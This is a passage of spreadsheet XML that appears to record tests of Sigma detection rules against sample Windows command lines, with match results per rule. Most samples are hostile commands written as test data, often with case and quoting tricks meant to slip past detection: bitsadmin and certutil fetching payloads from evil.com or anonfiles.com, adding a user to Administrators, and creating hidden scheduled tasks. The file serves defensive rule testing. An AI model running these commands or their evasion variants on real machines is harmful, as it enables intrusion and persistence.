      <c r="G186" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H186" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I186" s="43" t="n"/>
      <c r="J186" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K186" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="187" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A187" s="43" t="n"/>
      <c r="B187" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C187" s="36" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D187" s="36" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E187" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -c "Add-LocalGroupMember -Group 'Administrators' -Member 'testuser'"</t>
        </is>
      </c>
      <c r="F187" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G187" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H187" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I187" s="43" t="n"/>
      <c r="J187" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K187" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="188" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A188" s="43" t="n"/>
      <c r="B188" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C188" s="36" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D188" s="36" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E188" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -comMAnD "Add-LocalGroupMember -Group 'Administrators' -Member 'testuser'"</t>
        </is>
      </c>
      <c r="F188" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G188" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H188" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I188" s="43" t="n"/>
      <c r="J188" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K188" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="189" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A189" s="43" t="n"/>
      <c r="B189" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C189" s="36" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D189" s="36" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E189" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -COmmANd "Add-LocalGroupMember -Group 'Administrators' -Member 'testuser'"</t>
        </is>
      </c>
      <c r="F189" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G189" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H189" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I189" s="43" t="n"/>
      <c r="J189" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K189" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="190" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A190" s="43" t="n"/>
      <c r="B190" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmi_password_never_expire</t>
        </is>
      </c>
      <c r="C190" s="36" t="inlineStr">
        <is>
          <t>Password Set to Never Expire via WMI</t>
        </is>
      </c>
      <c r="D190" s="36" t="inlineStr">
        <is>
          <t>7864a175-3654-4824-9f0d-f0da18ab27c0</t>
        </is>
      </c>
      <c r="E190" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "Set-LocalUser -Name 'guest' -PasswordNeverExpires $true"</t>
        </is>
      </c>
      <c r="F190" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G190" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H190" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I190" s="43" t="n"/>
      <c r="J190" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K190" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="191" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A191" s="43" t="n"/>
      <c r="B191" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_recon_commands_and_processes</t>
        </is>
      </c>
      <c r="C191" s="36" t="inlineStr">
        <is>
          <t>Webshell Detection With Command Line Keywords</t>
        </is>
      </c>
      <c r="D191" s="36" t="inlineStr">
        <is>
          <t>bed2a484-9348-4143-8a8a-b801c979301c</t>
        </is>
      </c>
      <c r="E191" s="36" t="inlineStr">
        <is>
          <t>ping.exe /n 4 10.10.10.10</t>
        </is>
      </c>
      <c r="F191" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G191" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H191" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I191" s="43" t="n"/>
      <c r="J191" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K191" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="192" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A192" s="36" t="inlineStr">
        <is>
          <t>t1036.003</t>
        </is>
      </c>
      <c r="B192" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_download</t>
        </is>
      </c>
      <c r="C192" s="36" t="inlineStr">
        <is>
          <t>File Download Via Bitsadmin</t>
        </is>
      </c>
      <c r="D192" s="36" t="inlineStr">
        <is>
          <t>d059842b-6b9d-4ed1-b5c3-5b89143c6ede</t>
        </is>
      </c>
      <c r="E192" s="36" t="inlineStr">
        <is>
          <t>bitsadmin.exe	/transfer	myJob	http://evil.com/payload.exe	C:\temp\payload.exe</t>
        </is>
      </c>
      <c r="F192" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G192" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H192" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I192" s="43" t="n"/>
      <c r="J192" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K192" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="193" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A193" s="43" t="n"/>
      <c r="B193" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmi_password_never_expire</t>
        </is>
      </c>
      <c r="C193" s="36" t="inlineStr">
        <is>
          <t>Password Set to Never Expire via WMI</t>
        </is>
      </c>
      <c r="D193" s="36" t="inlineStr">
        <is>
          <t>7864a175-3654-4824-9f0d-f0da18ab27c0</t>
        </is>
      </c>
      <c r="E193" s="36" t="inlineStr">
        <is>
          <t>net user guest /expires:never</t>
        </is>
      </c>
      <c r="F193" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G193" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H193" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I193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93" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K193" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="194" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A194" s="43" t="n"/>
      <c r="B194" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmi_password_never_expire</t>
        </is>
      </c>
      <c r="C194" s="36" t="inlineStr">
        <is>
          <t>Password Set to Never Expire via WMI</t>
        </is>
      </c>
      <c r="D194" s="36" t="inlineStr">
        <is>
          <t>7864a175-3654-4824-9f0d-f0da18ab27c0</t>
        </is>
      </c>
      <c r="E194" s="36" t="inlineStr">
        <is>
          <t>net user guest /expiREs:never</t>
        </is>
      </c>
      <c r="F194" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G194" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H194" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I194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194" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K194" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="195" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A195" s="43" t="n"/>
      <c r="B195" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmi_password_never_expire</t>
        </is>
      </c>
      <c r="C195" s="36" t="inlineStr">
        <is>
          <t>Password Set to Never Expire via WMI</t>
        </is>
      </c>
      <c r="D195" s="36" t="inlineStr">
        <is>
          <t>7864a175-3654-4824-9f0d-f0da18ab27c0</t>
        </is>
      </c>
      <c r="E195" s="36" t="inlineStr">
        <is>
          <t>net user guest -"expires:never"</t>
        </is>
      </c>
      <c r="F195" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G195" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H195" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I195" s="36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95" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K195" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="196" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A196" s="43" t="n"/>
      <c r="B196" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmi_password_never_expire</t>
        </is>
      </c>
      <c r="C196" s="36" t="inlineStr">
        <is>
          <t>Password Set to Never Expire via WMI</t>
        </is>
      </c>
      <c r="D196" s="36" t="inlineStr">
        <is>
          <t>7864a175-3654-4824-9f0d-f0da18ab27c0</t>
        </is>
      </c>
      <c r="E196" s="36" t="inlineStr">
        <is>
          <t>net user guest /"expires:never"</t>
        </is>
      </c>
      <c r="F196" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G196" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H196" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I196" s="36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196" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K196" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="197" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A197" s="43" t="n"/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</row>
    <row r="198" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A198" s="36" t="inlineStr">
        <is>
          <t>t1053</t>
        </is>
      </c>
      <c r="B198" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution</t>
        </is>
      </c>
      <c r="C198" s="36" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution</t>
        </is>
      </c>
      <c r="D198" s="36" t="inlineStr">
        <is>
          <t>42a993dd-bb3e-48c8-b372-4d6684c4106c</t>
        </is>
      </c>
      <c r="E198" s="43" t="n"/>
      <c r="F198" s="43" t="n"/>
      <c r="G198" s="43" t="n"/>
      <c r="H198" s="43" t="n"/>
      <c r="I198" s="43" t="n"/>
      <c r="J198" s="43" t="n"/>
      <c r="K198" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="199" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A199" s="43" t="n"/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</row>
    <row r="200" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A200" s="36" t="inlineStr">
        <is>
          <t>t1053.005</t>
        </is>
      </c>
      <c r="B200" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_powersploit_empire_default_schtasks</t>
        </is>
      </c>
      <c r="C200" s="36" t="inlineStr">
        <is>
          <t>HackTool - Default PowerSploit/Empire Scheduled Task Creation</t>
        </is>
      </c>
      <c r="D200" s="36" t="inlineStr">
        <is>
          <t>56c217c3-2de2-479b-990f-5c109ba8458f</t>
        </is>
      </c>
      <c r="E200" s="36" t="inlineStr">
        <is>
          <t>schtasks.exe /Create /TN EvilTask /TR "C:\Windows\System32\calc.exe" /SC WEEKLY /D MON /ST 08:00</t>
        </is>
      </c>
      <c r="F200" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G200" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H200" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I200" s="36" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J200" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K200" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="201" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A201" s="36" t="inlineStr">
        <is>
          <t>t1053.005</t>
        </is>
      </c>
      <c r="B201" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_powersploit_empire_default_schtasks</t>
        </is>
      </c>
      <c r="C201" s="36" t="inlineStr">
        <is>
          <t>HackTool - Default PowerSploit/Empire Scheduled Task Creation</t>
        </is>
      </c>
      <c r="D201" s="36" t="inlineStr">
        <is>
          <t>56c217c3-2de2-479b-990f-5c109ba8458f</t>
        </is>
      </c>
      <c r="E201" s="36" t="inlineStr">
        <is>
          <t>schtasks.exe /CReatE -"TN" EvilTask /TR "C:\Windows\System32\calc.exe" /sc WEEKLY -"D" MON -"ST" 08:00</t>
        </is>
      </c>
      <c r="F201" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G201" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H201" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I201" s="36" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J201" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K201" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="202" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A202" s="36" t="inlineStr">
        <is>
          <t>t1053.005</t>
        </is>
      </c>
      <c r="B202" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_powersploit_empire_default_schtasks</t>
        </is>
      </c>
      <c r="C202" s="36" t="inlineStr">
        <is>
          <t>HackTool - Default PowerSploit/Empire Scheduled Task Creation</t>
        </is>
      </c>
      <c r="D202" s="36" t="inlineStr">
        <is>
          <t>56c217c3-2de2-479b-990f-5c109ba8458f</t>
        </is>
      </c>
      <c r="E202" s="36" t="inlineStr">
        <is>
          <t>schtasks.exe /cReatE /TN EvilTask /TR "C:\Windows\System32\calc.exe" -"SC" WEEKLY /D MON -"ST" 08:00</t>
        </is>
      </c>
      <c r="F202" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G202" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H202" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I202" s="36" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J202" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K202" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="203" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A203" s="36" t="inlineStr">
        <is>
          <t>t1053.005</t>
        </is>
      </c>
      <c r="B203" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_powersploit_empire_default_schtasks</t>
        </is>
      </c>
      <c r="C203" s="36" t="inlineStr">
        <is>
          <t>HackTool - Default PowerSploit/Empire Scheduled Task Creation</t>
        </is>
      </c>
      <c r="D203" s="36" t="inlineStr">
        <is>
          <t>56c217c3-2de2-479b-990f-5c109ba8458f</t>
        </is>
      </c>
      <c r="E203" s="36" t="inlineStr">
        <is>
          <t>schtasks.exe /Create /TN EvilTask /TR "C:\Windows\System32\calc.exe" /SC WEEKLY /D MON /"ST" 08:00</t>
        </is>
      </c>
      <c r="F203" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G203" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H203" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I203" s="36" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J203" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K203" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="204" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A204" s="43" t="n"/>
      <c r="B204" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_download_direct_ip</t>
        </is>
      </c>
      <c r="C204" s="36" t="inlineStr">
        <is>
          <t>Suspicious Download From Direct IP Via Bitsadmin</t>
        </is>
      </c>
      <c r="D204" s="36" t="inlineStr">
        <is>
          <t>99c840f2-2012-46fd-9141-c761987550ef</t>
        </is>
      </c>
      <c r="E204" s="36" t="inlineStr">
        <is>
          <t>bitsadmin /"transfer" downloadJob http://010.0.0.1/malicious.exe C:\Windows\Temp\malicious.exe</t>
        </is>
      </c>
      <c r="F204" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G204" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H204" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I204" s="43" t="n"/>
      <c r="J204" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K204" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="205" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A205" s="43" t="n"/>
      <c r="B205" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_download_direct_ip</t>
        </is>
      </c>
      <c r="C205" s="36" t="inlineStr">
        <is>
          <t>Suspicious Download From Direct IP Via Bitsadmin</t>
        </is>
      </c>
      <c r="D205" s="36" t="inlineStr">
        <is>
          <t>99c840f2-2012-46fd-9141-c761987550ef</t>
        </is>
      </c>
      <c r="E205" s="36" t="inlineStr">
        <is>
          <t>bitsadmin -"transfer" downloadJob http://010.0.0.1/malicious.exe C:\Windows\Temp\malicious.exe</t>
        </is>
      </c>
      <c r="F205" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G205" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H205" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I205" s="43" t="n"/>
      <c r="J205" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K205" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="206" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A206" s="43" t="n"/>
      <c r="B206" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_download_file_sharing_domains</t>
        </is>
      </c>
      <c r="C206" s="36" t="inlineStr">
        <is>
          <t>Suspicious Download From File-Sharing Website Via Bitsadmin</t>
        </is>
      </c>
      <c r="D206" s="36" t="inlineStr">
        <is>
          <t>8518ed3d-f7c9-4601-a26c-f361a4256a0c</t>
        </is>
      </c>
      <c r="E206" s="36" t="inlineStr">
        <is>
          <t>certutil /"urlcache" -SplIt -"f" https://anonfiles.com/example/payload.exe C:\Users\Public\payload.exe</t>
        </is>
      </c>
      <c r="F206" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G206" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H206" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I206" s="43" t="n"/>
      <c r="J206" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K206" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="207" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A207" s="36" t="inlineStr">
        <is>
          <t>t1053.005</t>
        </is>
      </c>
      <c r="B207" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_powersploit_empire_default_schtasks</t>
        </is>
      </c>
      <c r="C207" s="36" t="inlineStr">
        <is>
          <t>HackTool - Default PowerSploit/Empire Scheduled Task Creation</t>
        </is>
      </c>
      <c r="D207" s="36" t="inlineStr">
        <is>
          <t>56c217c3-2de2-479b-990f-5c109ba8458f</t>
        </is>
      </c>
      <c r="E207" s="36" t="inlineStr">
        <is>
          <t>schtasks.exe /CREaTe /TN EvilTask -"TR" "C:\Windows\System32\calc.exe" /"SC" WEEKLY -"D" MON /ST 08:00</t>
        </is>
      </c>
      <c r="F207" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G207" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H207" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I207" s="36" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J207" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K207" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="208" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A208" s="43" t="n"/>
      <c r="B208" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_download_file_sharing_domains</t>
        </is>
      </c>
      <c r="C208" s="36" t="inlineStr">
        <is>
          <t>Suspicious Download From File-Sharing Website Via Bitsadmin</t>
        </is>
      </c>
      <c r="D208" s="36" t="inlineStr">
        <is>
          <t>8518ed3d-f7c9-4601-a26c-f361a4256a0c</t>
        </is>
      </c>
      <c r="E208" s="36" t="inlineStr">
        <is>
          <t>certutil /"urlcache" -"split" -f https://anonfiles.com/example/payload.exe C:\Users\Public\payload.exe</t>
        </is>
      </c>
      <c r="F208" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G208" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H208" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I208" s="43" t="n"/>
      <c r="J208" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K208" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="209" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A209" s="36" t="inlineStr">
        <is>
          <t>t1053.005</t>
        </is>
      </c>
      <c r="B209" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_powersploit_empire_default_schtasks</t>
        </is>
      </c>
      <c r="C209" s="36" t="inlineStr">
        <is>
          <t>HackTool - Default PowerSploit/Empire Scheduled Task Creation</t>
        </is>
      </c>
      <c r="D209" s="36" t="inlineStr">
        <is>
          <t>56c217c3-2de2-479b-990f-5c109ba8458f</t>
        </is>
      </c>
      <c r="E209" s="36" t="inlineStr">
        <is>
          <t>schtasks.exe /crEaTE /"TN" EvilTask /TR "C:\Windows\System32\calc.exe" -"SC" WEEKLY /D MON /"ST" 08:00</t>
        </is>
      </c>
      <c r="F209" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G209" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H209" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I209" s="36" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J209" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K209" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="210" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A210" s="43" t="n"/>
      <c r="B210" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_download_file_sharing_domains</t>
        </is>
      </c>
      <c r="C210" s="36" t="inlineStr">
        <is>
          <t>Suspicious Download From File-Sharing Website Via Bitsadmin</t>
        </is>
      </c>
      <c r="D210" s="36" t="inlineStr">
        <is>
          <t>8518ed3d-f7c9-4601-a26c-f361a4256a0c</t>
        </is>
      </c>
      <c r="E210" s="36" t="inlineStr">
        <is>
          <t>certutil -"urlcache" /"split" -f https://anonfiles.com/example/payload.exe C:\Users\Public\payload.exe</t>
        </is>
      </c>
      <c r="F210" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G210" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H210" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I210" s="43" t="n"/>
      <c r="J210" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K210" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="211" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A211" s="36" t="inlineStr">
        <is>
          <t>t1053.005</t>
        </is>
      </c>
      <c r="B211" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_powersploit_empire_default_schtasks</t>
        </is>
      </c>
      <c r="C211" s="36" t="inlineStr">
        <is>
          <t>HackTool - Default PowerSploit/Empire Scheduled Task Creation</t>
        </is>
      </c>
      <c r="D211" s="36" t="inlineStr">
        <is>
          <t>56c217c3-2de2-479b-990f-5c109ba8458f</t>
        </is>
      </c>
      <c r="E211" s="36" t="inlineStr">
        <is>
          <t>schtasks.exe /Create /TN "WinUpdateTask" /TR "powershell -NoProfile -NonInteractive -WindowStyle Hidden -Command \"Write-Host 'Test'\"" /SC ONLOGON</t>
        </is>
      </c>
      <c r="F211" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G211" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H211" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I211" s="36" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J211" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K211" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="212" ht="15.75" customHeight="1" s="42">
      <c r="A212" s="43" t="n"/>
      <c r="B212" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_download_susp_extensions</t>
        </is>
      </c>
      <c r="C212" s="36" t="inlineStr">
        <is>
          <t>File With Suspicious Extension Downloaded Via Bitsadmin</t>
        </is>
      </c>
      <c r="D212" s="36" t="inlineStr">
        <is>
          <t>5b80a791-ad9b-4b75-bcc1-ad4e1e89c200</t>
        </is>
      </c>
      <c r="E212" s="36" t="inlineStr">
        <is>
          <t>bitsadmin -"transfer" myjob /"download" /priority normal http://example.com/payload.tmp C:\Users\Public\payload.tmp</t>
        </is>
      </c>
      <c r="F212" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G212" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H212" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I212" s="43" t="n"/>
      <c r="J212" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K212" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="213" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A213" s="43" t="n"/>
      <c r="B213" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_download_susp_targetfolder</t>
        </is>
      </c>
      <c r="C213" s="36" t="inlineStr">
        <is>
          <t>File Download Via Bitsadmin To A Suspicious Target Folder</t>
        </is>
      </c>
      <c r="D213" s="36" t="inlineStr">
        <is>
          <t>2ddef153-167b-4e89-86b6-757a9e65dcac</t>
        </is>
      </c>
      <c r="E213" s="36" t="inlineStr">
        <is>
          <t>bitsadmin -"transfer" myJob /DOWNLOAd -"priority" high https://evil.com/payload.exe C:\Users\JohnDoe\Downloads\payload.exe</t>
        </is>
      </c>
      <c r="F213" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G213" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H213" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I213" s="43" t="n"/>
      <c r="J213" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K213" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="214" ht="15.75" customHeight="1" s="42">
      <c r="A214" s="43" t="n"/>
      <c r="B214" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_download_susp_targetfolder</t>
        </is>
      </c>
      <c r="C214" s="36" t="inlineStr">
        <is>
          <t>File Download Via Bitsadmin To A Suspicious Target Folder</t>
        </is>
      </c>
      <c r="D214" s="36" t="inlineStr">
        <is>
          <t>2ddef153-167b-4e89-86b6-757a9e65dcac</t>
        </is>
      </c>
      <c r="E214" s="36" t="inlineStr">
        <is>
          <t>bitsadmin -"transfer" myJob /doWnLoAD /pRiOrIty high https://evil.com/payload.exe C:\Users\JohnDoe\Downloads\payload.exe</t>
        </is>
      </c>
      <c r="F214" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G214" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H214" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I214" s="43" t="n"/>
      <c r="J214" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K214" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="215" ht="15.75" customHeight="1" s="42">
      <c r="A215" s="43" t="n"/>
      <c r="B215" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_download_uncommon_targetfolder</t>
        </is>
      </c>
      <c r="C215" s="36" t="inlineStr">
        <is>
          <t>File Download Via Bitsadmin To An Uncommon Target Folder</t>
        </is>
      </c>
      <c r="D215" s="36" t="inlineStr">
        <is>
          <t>6e30c82f-a9f8-4aab-b79c-7c12bce6f248</t>
        </is>
      </c>
      <c r="E215" s="36" t="inlineStr">
        <is>
          <t>bitsadmin /"transfer" myJob http://example.com/payload.exe C:\Windows\System32\drivers\etc\payload.exe</t>
        </is>
      </c>
      <c r="F215" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G215" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H215" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I215" s="43" t="n"/>
      <c r="J215" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K215" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="216" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A216" s="36" t="inlineStr">
        <is>
          <t>t1053.005</t>
        </is>
      </c>
      <c r="B216" s="36" t="inlineStr">
        <is>
